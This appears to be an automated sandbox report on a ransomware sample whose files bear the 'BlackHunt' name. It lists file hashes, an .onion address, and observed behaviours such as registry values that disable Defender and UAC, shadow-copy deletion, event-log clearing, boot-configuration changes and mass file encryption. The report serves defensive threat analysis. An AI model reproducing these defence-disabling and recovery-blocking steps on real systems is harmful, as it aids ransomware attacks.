Analysis
-
max time kernel
117s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
18/01/2024, 23:38
Static task
static1
Behavioral task
behavioral1
Sample
67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe
Resource
win10v2004-20231215-en
General
-
Target
67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe
-
Size
707KB
-
MD5
0f69ed18329a57d00f252556c051b3f9
-
SHA1
a484ac6ac33fb09bfbd9b3e6e798dc0639271f9b
-
SHA256
67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf
-
SHA512
4e7636a1d193f5920b668864e656c5c003406f9e3998ea37a91a422d043910dff2f873b74db042c155ea5ad6fcff72068e90cfb694af1abfba6f25fe01e228a8
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1f8avnh:6uaTmkZJ+naie5OTamgEoKxLW+0h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1128 fsutil.exe 1164 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 3568 wevtutil.exe 3584 wevtutil.exe 3648 wevtutil.exe 3488 wevtutil.exe 3728 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 800 bcdedit.exe 2996 bcdedit.exe 2736 bcdedit.exe 2824 bcdedit.exe -
Renames multiple (2884) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 1904 wbadmin.exe 2340 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 1608 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\T: 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened (read-only) \??\U: 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened (read-only) \??\I: 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened (read-only) \??\P: 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened (read-only) \??\N: 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened (read-only) \??\M: 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened (read-only) \??\Y: 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened (read-only) \??\S: 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened (read-only) \??\H: 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened (read-only) \??\J: 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened (read-only) \??\E: 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened (read-only) \??\A: 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\R: 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened (read-only) \??\G: 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened (read-only) \??\K: 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened (read-only) \??\V: 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\Q: 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened (read-only) \??\O: 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened (read-only) \??\L: 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened (read-only) \??\Z: 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened (read-only) \??\X: 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened (read-only) \??\B: 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened (read-only) \??\F: vssadmin.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Google\#BlackHunt_Private.key 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\PST8PDT 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File created C:\Program Files (x86)\Google\Update\Download\#BlackHunt_ReadMe.hta 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\7-Zip\Lang\bg.txt 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\#BlackHunt_Private.key 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File created C:\Program Files (x86)\Uninstall Information\#BlackHunt_Private.key 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\7-Zip\Lang\gu.txt 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wake 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\#BlackHunt_ReadMe.hta 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\alt-rt.jar 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\#BlackHunt_ReadMe.txt 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-highlight.png 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\Java\jre7\lib\currency.data 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\#BlackHunt_Private.key 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_VideoInset.png 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Casablanca 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\Java\jre7\release 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File created C:\Program Files\VideoLAN\VLC\locale\br\#BlackHunt_Private.key 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_out\#BlackHunt_ReadMe.hta 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\#BlackHunt_Private.key 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\DVD Maker\bod_r.TTF 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\#BlackHunt_Private.key 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-io-ui.jar 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.api 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text_3.5.300.v20130515-1451.jar 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\#BlackHunt_Private.key 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\#BlackHunt_ReadMe.txt 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\passport_mask_left.png 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\#BlackHunt_Private.key 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Khandyga 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_zh_4.4.0.v20140623020002.jar 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_leftarrow.png 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_PreComp_MATTE_PAL.wmv 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port-au-Prince 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\#BlackHunt_Private.key 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director_2.3.100.v20140224-1921.jar 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\DVD Maker\rtstreamsource.ax 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cambridge_Bay 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Esl\#BlackHunt_Private.key 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.properties 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#BlackHunt_ReadMe.txt 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_filter\#BlackHunt_Private.key 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File created C:\Program Files\Java\jre7\lib\management\#BlackHunt_ReadMe.hta 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#BlackHunt_ReadMe.txt 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-overlay.png 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Push\1047x576black.png 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\#BlackHunt_Private.key 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\#BlackHunt_ReadMe.hta 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt_3.103.1.v20140903-1938.jar 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\#BlackHunt_ReadMe.hta 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\#BlackHunt_ReadMe.hta 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Title_Page_Ref_PAL.wmv 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Chita 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\license.html 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\Java\jre7\lib\jce.jar 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Miquelon 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hebron 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1824 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1972 vssadmin.exe 1224 vssadmin.exe 892 vssadmin.exe 1608 vssadmin.exe 1896 vssadmin.exe 3632 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 3936 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2980 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 4008 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe Token: SeRestorePrivilege 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe Token: SeBackupPrivilege 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe Token: SeTakeOwnershipPrivilege 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe Token: SeAuditPrivilege 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe Token: SeSecurityPrivilege 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe Token: SeIncBasePriorityPrivilege 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe Token: SeBackupPrivilege 3064 vssvc.exe Token: SeRestorePrivilege 3064 vssvc.exe Token: SeAuditPrivilege 3064 vssvc.exe Token: SeBackupPrivilege 3144 wbengine.exe Token: SeRestorePrivilege 3144 wbengine.exe Token: SeSecurityPrivilege 3144 wbengine.exe Token: SeSecurityPrivilege 3584 wevtutil.exe Token: SeBackupPrivilege 3584 wevtutil.exe Token: SeSecurityPrivilege 3648 wevtutil.exe Token: SeBackupPrivilege 3648 wevtutil.exe Token: SeSecurityPrivilege 3488 wevtutil.exe Token: SeBackupPrivilege 3488 wevtutil.exe Token: SeSecurityPrivilege 3728 wevtutil.exe Token: SeSecurityPrivilege 3568 wevtutil.exe Token: SeBackupPrivilege 3728 wevtutil.exe Token: SeBackupPrivilege 3568 wevtutil.exe Token: SeDebugPrivilege 3936 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1404 wrote to memory of 3064 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 29 PID 1404 wrote to memory of 3064 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 29 PID 1404 wrote to memory of 3064 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 29 PID 1404 wrote to memory of 3064 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 29 PID 1404 wrote to memory of 2164 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 31 PID 1404 wrote to memory of 2164 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 31 PID 1404 wrote to memory of 2164 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 31 PID 1404 wrote to memory of 2164 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 31 PID 1404 wrote to memory of 3056 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 126 PID 1404 wrote to memory of 3056 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 126 PID 1404 wrote to memory of 3056 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 126 PID 1404 wrote to memory of 3056 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 126 PID 3064 wrote to memory of 3028 3064 vssvc.exe 34 PID 3064 wrote to memory of 3028 3064 vssvc.exe 34 PID 3064 wrote to memory of 3028 3064 vssvc.exe 34 PID 1404 wrote to memory of 884 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 35 PID 1404 wrote to memory of 884 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 35 PID 1404 wrote to memory of 884 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 35 PID 1404 wrote to memory of 884 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 35 PID 2164 wrote to memory of 2748 2164 cmd.exe 36 PID 2164 wrote to memory of 2748 2164 cmd.exe 36 PID 2164 wrote to memory of 2748 2164 cmd.exe 36 PID 1404 wrote to memory of 2664 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 37 PID 1404 wrote to memory of 2664 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 37 PID 1404 wrote to memory of 2664 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 37 PID 1404 wrote to memory of 2664 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 37 PID 1404 wrote to memory of 2700 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 40 PID 1404 wrote to memory of 2700 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 40 PID 1404 wrote to memory of 2700 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 40 PID 1404 wrote to memory of 2700 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 40 PID 1404 wrote to memory of 2856 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 43 PID 1404 wrote to memory of 2856 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 43 PID 1404 wrote to memory of 2856 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 43 PID 1404 wrote to memory of 2856 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 43 PID 1404 wrote to memory of 2724 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 44 PID 1404 wrote to memory of 2724 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 44 PID 1404 wrote to memory of 2724 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 44 PID 1404 wrote to memory of 2724 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 44 PID 1404 wrote to memory of 2720 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 47 PID 1404 wrote to memory of 2720 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 47 PID 1404 wrote to memory of 2720 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 47 PID 1404 wrote to memory of 2720 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 47 PID 2664 wrote to memory of 2760 2664 cmd.exe 48 PID 2664 wrote to memory of 2760 2664 cmd.exe 48 PID 2664 wrote to memory of 2760 2664 cmd.exe 48 PID 3056 wrote to memory of 2620 3056 conhost.exe 49 PID 3056 wrote to memory of 2620 3056 conhost.exe 49 PID 3056 wrote to memory of 2620 3056 conhost.exe 49 PID 884 wrote to memory of 2768 884 cmd.exe 50 PID 884 wrote to memory of 2768 884 cmd.exe 50 PID 884 wrote to memory of 2768 884 cmd.exe 50 PID 1404 wrote to memory of 2484 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 51 PID 1404 wrote to memory of 2484 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 51 PID 1404 wrote to memory of 2484 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 51 PID 1404 wrote to memory of 2484 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 51 PID 1404 wrote to memory of 2744 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 53 PID 1404 wrote to memory of 2744 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 53 PID 1404 wrote to memory of 2744 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 53 PID 1404 wrote to memory of 2744 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 53 PID 1404 wrote to memory of 2596 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 54 PID 1404 wrote to memory of 2596 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 54 PID 1404 wrote to memory of 2596 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 54 PID 1404 wrote to memory of 2596 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 54 PID 1404 wrote to memory of 2456 1404 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe 57 -
System policy modification 1 TTPs 3 IoCs
